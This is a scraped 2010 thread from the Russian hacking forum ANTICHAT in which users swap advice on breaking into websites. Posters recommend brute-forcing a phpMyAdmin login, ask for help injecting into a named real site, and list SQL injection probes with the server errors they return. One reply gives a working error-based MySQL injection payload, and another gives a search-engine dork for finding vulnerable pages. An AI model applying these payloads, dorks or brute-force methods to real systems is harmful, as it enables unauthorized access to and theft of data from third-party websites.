ANTICHAT — форум по информационной безопасности, OSINT и технологиям
ANTICHAT — русскоязычное сообщество по безопасности, OSINT и программированию.
Форум ранее работал на доменах antichat.ru, antichat.com и antichat.club,
и теперь снова доступен на новом адресе —
forum.antichat.xyz.
Форум восстановлен и продолжает развитие: доступны архивные темы, добавляются новые обсуждения и материалы.
⚠️ Старые аккаунты восстановить невозможно — необходимо зарегистрироваться заново.
 |
|
22.07.2010, 23:07
|
|
Познавший АНТИЧАТ
Регистрация: 15.01.2008
Сообщений: 1,166
Провел на форуме:
2459557
Репутация:
606
|
|
Сообщение от Anexroid
Anexroid said:
Да, нашел вход в phpmyadmin. Имя пользователя знаю.
Авторизация через .htaccess
Вопрос номер 2:
При помощи чего брутить?
Скриптами, прогами. Можно даже легендарной Brutus-AE2(так вроде называется), там брут форм есть и Basic Auth
|
|
|
22.07.2010, 23:08
|
|
Guest
Сообщений: n/a
Провел на форуме:
20501
Репутация:
5
|
|
Anexroid
можно заюзать WebBruteForcer
И если вход через .htaccess то имя пользователя моет быть уже другим!!
|
|
|
|
22.07.2010, 23:40
|
|
Участник форума
Регистрация: 06.01.2010
Сообщений: 136
Провел на форуме:
568388
Репутация:
87
|
|
Сообщение от Gorev
Gorev said:
разговор о другой скули друг... посмотри вышe, Попугай имел в виду ошибку на мейл.рy
не заметил(
sry
|
|
|
|
23.07.2010, 00:21
|
|
Участник форума
Регистрация: 29.11.2007
Сообщений: 116
Провел на форуме:
283596
Репутация:
88
|
|
Хорошо разбирающиеся люди в скулях, подскажите возможно ли закрутить тут что-то и вообще уязвимо тут что-то или нет, а то вроде как да и вроде как там MSSQL но нихрена не выходит
Сообщение от None
http://www.bildkontakte.de/?f=kwVerg
|
|
|
|
23.07.2010, 00:49
|
|
Участник форума
Регистрация: 06.01.2010
Сообщений: 136
Провел на форуме:
568388
Репутация:
87
|
|
Сообщение от AKYLA
AKYLA said:
Хорошо разбирающиеся люди в скулях, подскажите возможно ли закрутить тут что-то и вообще уязвимо тут что-то или нет, а то вроде как да и вроде как там MSSQL но нихрена не выходит
что за тупой линк какой ище mssql есле там редирект ?!
|
|
|
|
23.07.2010, 01:11
|
|
Познающий
Регистрация: 13.04.2010
Сообщений: 42
Провел на форуме:
460968
Репутация:
81
|
|
копаю движок:
PHP код:
PHP:
[COLOR="#000000"][COLOR="#0000BB"][/COLOR][COLOR="#007700"]echo[/COLOR][COLOR="#DD0000"]"
Enter password:
"[/COLOR][COLOR="#007700"];[/COLOR][/COLOR]
можно ли провести пассивную-xss атаку? как и в каких браузерах? |
|
|
|
23.07.2010, 02:24
|
|
Новичок
Регистрация: 29.04.2010
Сообщений: 19
Провел на форуме:
58603
Репутация:
3
|
|
как же раскрутить скуль
Всем привет!
Помогите советом... как составить запрос, что бы хоть чтонить вывелось... ошибки, etc.
(не могу дать ссылку, т.к. инфа важная)
http://site.com/view.php?id=134
Вот запрос:
SELECT * FROM tbl_art WHERE `GRP_ID` IN (0) AND `OBJ_ID` IN (134)
При view.php?id=134z
SQL ERROR: Unknown column '134z' in 'where clause'
При view.php?id=134z()
SQL ERROR: Column count of mysql.proc is wrong. Expected 20, found 16. Created with MySQL 50077, now running 50148. Please use mysql_upgrade to fix this error.
При view.php?id=999' - выдается сообщение о несуществующей статье (при 999, то же)
При view.php?id=134' - стандартная ошибка sql синтаксиса
При view.php?id=134)+and+(a
SQL ERROR: Unknown column 'a' in 'where clause'
При view.php?id=134)+union+select+(a
SQL ERROR: Unknown column 'a' in 'field list'
При view.php?id=134)+union+select+(user()
SQL ERROR: The used SELECT statements have a different number of columns
При view.php?id=134)+union+select+(1,2
SQL ERROR: Operand should contain 1 column(s)
При view.php?id=134)+union+select+(1),(2),(3),(4 - ошибки нет, но и нет текста статьи
При view.php?id=134)+union+select+1,2,3,4--+ - так же, как и выше
|
|
|
|
23.07.2010, 02:52
|
|
Новичок
Регистрация: 26.04.2010
Сообщений: 26
Провел на форуме:
136979
Репутация:
53
|
|
Сообщение от AKYLA
AKYLA said:
Хорошо разбирающиеся люди в скулях, подскажите возможно ли закрутить тут что-то и вообще уязвимо тут что-то или нет, а то вроде как да и вроде как там MSSQL но нихрена не выходит
Эта тема вопросы а не "Ей чуваки расскрутите скуль за меня!!1"
site:свой.сайт.ху* filetypehp inurl:id - и тыкай любимые кавычки!!!
|
|
|
|
23.07.2010, 03:05
|
|
Новичок
Регистрация: 26.04.2010
Сообщений: 26
Провел на форуме:
136979
Репутация:
53
|
|
IMMORTAL_S
Трудно сказать без ссылки, хотя б в ПМ что ле раздавал )
стандартные комбинации не подходят?
Попробуй найти другие бажные скрипты, если есть один вполне вероятно что другие там тоже есть )
|
|
|
|
23.07.2010, 03:20
|
|
Участник форума
Регистрация: 06.01.2010
Сообщений: 136
Провел на форуме:
568388
Репутация:
87
|
|
IMMORTAL_S
iew.php?id=999'+or+(select+count(*)+from+informati on_schema.tables+group+by+concat(version(),floor(r and(0)*2)))--+
|
|
|
|
|
|
|
|
Здесь присутствуют: 1 (пользователей: 0 , гостей: 1)
|
|
|
|
![Аватар для [Feldmarschall]](/avatars/avatar109813.jpg?2262717){kind=avatar}
![Аватар для [Feldmarschall]](/avatars/avatar109813.jpg?2262810){kind=avatar}
![Аватар для [Feldmarschall]](/avatars/avatar109813.jpg?2263064){kind=avatar}
Похожие темы
Линейный вид
